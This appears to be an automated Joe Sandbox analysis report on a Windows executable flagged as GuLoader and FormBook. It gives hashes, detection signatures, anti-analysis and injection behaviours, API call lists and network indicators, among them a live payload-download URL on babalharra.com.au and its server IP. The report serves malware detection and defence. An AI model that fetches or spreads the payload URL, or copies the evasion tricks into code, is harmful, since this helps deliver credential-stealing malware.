Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ntwph4urc1.exe

Overview

General Information

Sample name:Ntwph4urc1.exe
renamed because original name is a hash value
Original sample name:ef82d714885adeb1ae55d801154e0489f3391ba0a632a10ae4caec482215fd6f.exe
Analysis ID:1588721
MD5:c57da1bb37a79e6f05722518dbadb3ce
SHA1:c7d63301754e2a380d29a9170654670e4beeb1ad
SHA256:ef82d714885adeb1ae55d801154e0489f3391ba0a632a10ae4caec482215fd6f
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook, GuLoader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Ntwph4urc1.exe (PID: 7012 cmdline: "C:\Users\user\Desktop\Ntwph4urc1.exe" MD5: C57DA1BB37A79E6F05722518DBADB3CE)
    • Ntwph4urc1.exe (PID: 2224 cmdline: "C:\Users\user\Desktop\Ntwph4urc1.exe" MD5: C57DA1BB37A79E6F05722518DBADB3CE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3114905568.00000000365B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.2691971369.000000000507C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-11T04:42:16.439704+010028032702Potentially Bad Traffic192.168.2.649986122.201.127.17443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: Ntwph4urc1.exeReversingLabs: Detection: 73%
      Source: Ntwph4urc1.exeVirustotal: Detection: 75%Perma Link
      Yara detected FormBook
      Source: Yara matchFile source: 00000006.00000002.3114905568.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for sample
      Source: Ntwph4urc1.exeJoe Sandbox ML: detected
      Source: Ntwph4urc1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 122.201.127.17:443 -> 192.168.2.6:49986 version: TLS 1.2
      Source: Ntwph4urc1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Ntwph4urc1.exe, 00000006.00000001.2690896248.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3051193049.00000000365B5000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3053401808.0000000036762000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Ntwph4urc1.exe, Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3051193049.00000000365B5000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3053401808.0000000036762000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Ntwph4urc1.exe, 00000006.00000001.2690896248.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 0_2_0040674C FindFirstFileW,FindClose,0_2_0040674C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B00
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49986 -> 122.201.127.17:443
      Source: global trafficHTTP traffic detected: GET /yzSJO174.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: babalharra.com.auCache-Control: no-cache
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /yzSJO174.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: babalharra.com.auCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: babalharra.com.au
      Source: Ntwph4urc1.exe, 00000000.00000000.2173648853.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Ntwph4urc1.exe, 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Ntwph4urc1.exe, 00000006.00000000.2688245914.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Ntwph4urc1.exe, 00000006.00000001.2690896248.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: Ntwph4urc1.exe, 00000006.00000001.2690896248.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Ntwph4urc1.exe, 00000006.00000001.2690896248.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: Ntwph4urc1.exe, 00000006.00000002.3093403938.00000000067F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/
      Source: Ntwph4urc1.exe, 00000006.00000002.3093403938.00000000067F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/ES
      Source: Ntwph4urc1.exe, 00000006.00000003.3051661184.0000000006847000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000002.3093485249.0000000006849000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000002.3093403938.00000000067F8000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3051505446.0000000006847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/yzSJO174.bin
      Source: Ntwph4urc1.exe, 00000006.00000002.3093403938.00000000067F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/yzSJO174.binK
      Source: Ntwph4urc1.exe, 00000006.00000001.2690896248.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownHTTPS traffic detected: 122.201.127.17:443 -> 192.168.2.6:49986 version: TLS 1.2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 0_2_00405595 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405595

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000006.00000002.3114905568.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369835C0 NtCreateMutant,LdrInitializeThunk,6_2_369835C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_36982DF0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36983090 NtSetValueKey,6_2_36983090
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36983010 NtOpenDirectoryObject,6_2_36983010
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36983D10 NtOpenProcessToken,6_2_36983D10
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36983D70 NtOpenThread,6_2_36983D70
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369839B0 NtGetContextThread,6_2_369839B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36984650 NtSuspendThread,6_2_36984650
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36984340 NtSetContextThread,6_2_36984340
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982E80 NtReadVirtualMemory,6_2_36982E80
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982EA0 NtAdjustPrivilegesToken,6_2_36982EA0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982EE0 NtQueueApcThread,6_2_36982EE0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982E30 NtWriteVirtualMemory,6_2_36982E30
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982F90 NtProtectVirtualMemory,6_2_36982F90
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982FB0 NtResumeThread,6_2_36982FB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982FA0 NtQuerySection,6_2_36982FA0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982FE0 NtCreateFile,6_2_36982FE0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982F30 NtCreateSection,6_2_36982F30
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982F60 NtCreateProcessEx,6_2_36982F60
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982CA0 NtQueryInformationToken,6_2_36982CA0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982CC0 NtQueryVirtualMemory,6_2_36982CC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982CF0 NtOpenProcess,6_2_36982CF0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982C00 NtQueryInformationProcess,6_2_36982C00
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982C70 NtFreeVirtualMemory,6_2_36982C70
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982C60 NtCreateKey,6_2_36982C60
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982DB0 NtEnumerateKey,6_2_36982DB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982DD0 NtDelayExecution,6_2_36982DD0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982D10 NtMapViewOfSection,6_2_36982D10
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982D00 NtSetInformationFile,6_2_36982D00
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982D30 NtUnmapViewOfSection,6_2_36982D30
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982AB0 NtWaitForSingleObject,6_2_36982AB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982AD0 NtReadFile,6_2_36982AD0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982AF0 NtWriteFile,6_2_36982AF0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982B80 NtQueryInformationFile,6_2_36982B80
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982BA0 NtEnumerateValueKey,6_2_36982BA0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982BF0 NtAllocateVirtualMemory,6_2_36982BF0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982BE0 NtQueryValueKey,6_2_36982BE0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36982B60 NtClose,6_2_36982B60
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 0_2_73F51B5F0_2_73F51B5F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A016CC6_2_36A016CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369956306_2_36995630
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0F7B06_2_36A0F7B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0F43F6_2_36A0F43F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369414606_2_36941460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369ED5B06_2_369ED5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A195C36_2_36A195C3
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A075716_2_36A07571
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369552A06_2_369552A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B2C06_2_3696B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3699739A6_2_3699739A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0132D6_2_36A0132D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693D34C6_2_3693D34C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0F0E06_2_36A0F0E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A070E96_2_36A070E9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FF0CC6_2_369FF0CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C06_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695B1B06_2_3695B1B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A1B16B6_2_36A1B16B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F1726_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3698516C6_2_3698516C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36959EB06_2_36959EB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36955EC06_2_36955EC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951F926_2_36951F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0FFB16_2_36A0FFB1
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0FF096_2_36A0FF09
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0FCF26_2_36A0FCF2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C9C326_2_369C9C32
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696FDC06_2_3696FDC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A07D736_2_36A07D73
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36953D406_2_36953D40
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A01D5A6_2_36A01D5A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EDAAC6_2_369EDAAC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36995AA06_2_36995AA0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F1AA36_2_369F1AA3
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FDAC66_2_369FDAC6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A07A466_2_36A07A46
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0FA496_2_36A0FA49
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C3A6C6_2_369C3A6C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696FB806_2_3696FB80
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3698DBF96_2_3698DBF9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C5BF06_2_369C5BF0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0FB766_2_36A0FB76
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369538E06_2_369538E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369BD8006_2_369BD800
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E59106_2_369E5910
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369599506_2_36959950
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B9506_2_3696B950
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696C6E06_2_3696C6E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694C7C06_2_3694C7C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369747506_2_36974750
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369507706_2_36950770
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FE4F66_2_369FE4F6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F44206_2_369F4420
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A024466_2_36A02446
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A105916_2_36A10591
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369505356_2_36950535
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D02C06_2_369D02C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F02746_2_369F0274
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A103E66_2_36A103E6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695E3F06_2_3695E3F0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0A3526_2_36A0A352
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E20006_2_369E2000
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A041A26_2_36A041A2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A101AA6_2_36A101AA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A081CC6_2_36A081CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EA1186_2_369EA118
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369401006_2_36940100
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D81586_2_369D8158
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36962E906_2_36962E90
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0CE936_2_36A0CE93
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0EEDB6_2_36A0EEDB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0EE266_2_36A0EE26
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36950E596_2_36950E59
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CEFA06_2_369CEFA0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36942FC86_2_36942FC8
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695CFE06_2_3695CFE0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36970F306_2_36970F30
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F2F306_2_369F2F30
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36992F286_2_36992F28
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C4F406_2_369C4F40
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F0CB56_2_369F0CB5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36940CF26_2_36940CF2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36950C006_2_36950C00
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36968DBF6_2_36968DBF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694ADE06_2_3694ADE0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369ECD1F6_2_369ECD1F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695AD006_2_3695AD00
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694EA806_2_3694EA80
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A06BD76_2_36A06BD7
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0AB406_2_36A0AB40
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369368B86_2_369368B8
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697E8F06_2_3697E8F0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369528406_2_36952840
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695A8406_2_3695A840
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A1A9A66_2_36A1A9A6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369529A06_2_369529A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369669626_2_36966962
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: String function: 3693B970 appears 280 times
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: String function: 36985130 appears 58 times
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: String function: 369CF290 appears 105 times
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: String function: 36997E54 appears 111 times
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: String function: 369BEA12 appears 86 times
      Source: Ntwph4urc1.exe, 00000006.00000003.3053401808.000000003688F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Ntwph4urc1.exe
      Source: Ntwph4urc1.exe, 00000006.00000003.3051193049.00000000366D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Ntwph4urc1.exe
      Source: Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036BE1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Ntwph4urc1.exe
      Source: Ntwph4urc1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal80.troj.evad.winEXE@3/5@1/1
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 0_2_00404835 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404835
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 0_2_004021A2 CoCreateInstance,0_2_004021A2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspiresJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile created: C:\Users\user\AppData\Local\Temp\nsx6CF7.tmpJump to behavior
      Source: Ntwph4urc1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Ntwph4urc1.exeReversingLabs: Detection: 73%
      Source: Ntwph4urc1.exeVirustotal: Detection: 75%
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile read: C:\Users\user\Desktop\Ntwph4urc1.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Ntwph4urc1.exe "C:\Users\user\Desktop\Ntwph4urc1.exe"
